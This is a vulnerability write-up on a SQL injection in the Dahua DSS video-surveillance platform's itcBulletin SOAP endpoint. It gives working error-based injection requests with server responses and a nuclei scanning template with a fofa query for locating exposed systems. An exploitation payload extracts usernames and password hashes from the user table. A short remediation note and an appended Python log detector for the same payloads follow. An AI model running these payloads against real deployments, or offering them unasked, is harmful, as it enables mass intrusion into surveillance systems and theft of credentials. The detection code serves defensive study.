Dahua DSS SQL Injection Vulnerability (with exploit)
05 — Vulnerability reproduction

Send the following request to the test target. The payload makes the database evaluate md5(102103122):

```http
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
```

The response is as follows:

```http
HTTP/1.1 500 Internal Server Error
Connection: close
Content-Length: 581
Content-Type: text/xml;
Date: Tue, 19 Dec 2023 10:13:48 GMT
Server: Apache-Coyote/1.1

soap:Server
PreparedStatementCallback; uncategorized SQLException for SQL [select t.* from C_BULLETIN t where t.NETMARKING in ( (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1 ) ]; SQL state [HY000]; error code [1105]; XPATH syntax error: '~6cfe798ba8e5b85feb50164c59f4bec'; nested exception is java.sql.SQLException: XPATH syntax error: '~6cfe798ba8e5b85feb50164c59f4bec'
```

The response contains 6cfe798ba8e5b85feb50164c59f4bec, the MD5 the payload asked for, so the vulnerability is confirmed.

06 — nuclei POC

The POC file contents:

```yaml
id: dahua-dss-itcBulletin-sqli

info:
  name: 大华DSS itcBulletin SQL注入漏洞
  author: fgz
  severity: high
  description: 大华DSS数字监控系统itcBulletin接口存在SQL注入漏洞,攻击者可以利用该漏洞获取数据库敏感信息。
  metadata:
    fofa-query: app="dahua-DSS"

requests:
  - raw:
      - |+
        POST /portal/services/itcBulletin?wsdl HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

        (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code==500 && contains(body,"error code [1105]") && contains(body,"6cfe798ba8e5b85feb50164c59f4bec")'
```

Run the POC:

```
.\nuclei.exe -t dahua-dss-itcBulletin-sqli.yaml -l dahua-dss.txt
```

07 — Exploitation

To retrieve the system's usernames and passwords, replace the md5() call in the POC with a SQL subquery:

```http
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

(updatexml(1,concat(0x7e,(select substr(group_concat(login_name, " ",login_pass),1,30) from sys_user),0x7e),1))) and (1=1
```

The response is as follows:

```http
HTTP/1.1 500 Internal Server Error
Connection: close
Content-Length: 643
Content-Type: text/xml;charset=ISO-8859-1
Date: Tue, 19 Dec 2023 11:46:52 GMT
Server: Apache-Coyote/1.1

soap:Server
PreparedStatementCallback; uncategorized SQLException for SQL [select t.* from C_BULLETIN t where t.NETMARKING in ( (updatexml(1,concat(0x7e,(select substr(group_concat(login_name, " ",login_pass),1,30) from sys_user),0x7e),1))) and (1=1) ]; SQL state [HY000]; error code [1105]; XPATH syntax error: '~system 8e173a7bb9ec8156d772cf4~'; nested exception is java.sql.SQLException: XPATH syntax error: '~system 8e173a7bb9ec8156d772cf4~'
```

Here system is the username and 8e173a7bb9ec8156d772cf4 is the MD5 of its password.

08 — Remediation

Upgrade to the latest version, or deploy a WAF in front of the system for protection.
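For the WAF and monitoring side of the remediation above, the following is an added example written for this edit; it is not code from the original post or from any Dahua product. It inspects request/response pairs on two independent axes: request bodies are checked for the MySQL error-based injection primitives used in this write-up (updatexml/extractvalue, a 0x7e delimiter inside concat, a trailing tautology), and 500 responses are checked for an echoed XPATH error, which is the channel through which query results leak to the client. The log tuples and addresses are constructed samples, not captured traffic.

```python
import re
from dataclasses import dataclass, field

# Request-side signatures for MySQL error-based injection primitives.
# A hit is a review trigger, not proof of exploitation; the real fix is
# parameterized queries, and these checks only reduce exposure.
REQUEST_PATTERNS = {
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "tilde-concat": re.compile(r"\bconcat\s*\(\s*0x7e\b", re.I),
    "tautology": re.compile(r"\)\s*and\s*\(\s*1\s*=\s*1\b", re.I),
}

# Response-side signature: a MySQL XPATH error carrying the '~...' marker
# means database output is being copied into the HTTP response body.
RESPONSE_LEAK = re.compile(r"XPATH syntax error: '~([^']*)'")


@dataclass
class Finding:
    src: str
    path: str
    request_hits: list = field(default_factory=list)
    leaked_response: bool = False


def inspect(entry):
    """Inspect one (src_ip, path, status, request_body, response_body) tuple.

    Returns a Finding when either axis fires, otherwise None.
    """
    src, path, status, body, response = entry
    hits = [name for name, pat in REQUEST_PATTERNS.items() if pat.search(body)]
    leaked = status == 500 and RESPONSE_LEAK.search(response) is not None
    if hits or leaked:
        return Finding(src, path, hits, leaked)
    return None


def scan(entries):
    """Run inspect() over a sequence of log tuples and keep the findings."""
    return [f for f in (inspect(e) for e in entries) if f is not None]


# Constructed sample traffic (placeholder addresses and bodies; the SOAP
# envelope is omitted because only the inner parameter matters here).
SAMPLE_LOG = [
    # benign request, normal response
    ("10.0.0.5", "/portal/services/itcBulletin?wsdl", 200,
     "getBulletin netMarking=42", "<bulletin>ok</bulletin>"),
    # injection primitive in the request AND the error echoed back: data leaks
    ("10.0.0.9", "/portal/services/itcBulletin?wsdl", 500,
     "(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1",
     "soap:Server PreparedStatementCallback; uncategorized SQLException ... "
     "XPATH syntax error: '~6cfe798ba8e5b85feb50164c59f4bec'"),
    # same primitive, but the server returned a generic error page: probe only
    ("10.0.0.9", "/portal/services/itcBulletin?wsdl", 500,
     "(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1",
     "Internal error; request id 1235"),
    # unrelated 500 with no SQL error text: not flagged
    ("10.0.0.7", "/portal/services/itcBulletin?wsdl", 500,
     "getBulletin netMarking=42", "Internal error; request id 1234"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.src} {f.path} hits={f.request_hits} leak={f.leaked_response}")
```

The two axes are kept separate on purpose: a request hit with `leaked_response` False shows the primitive being tried against a deployment that no longer echoes SQL errors, while `leaked_response` True on its own would catch a variant payload the request patterns do not know about. In practice the response check is the stronger signal, since suppressing detailed SQLException text in SOAP faults removes the exfiltration channel regardless of payload shape.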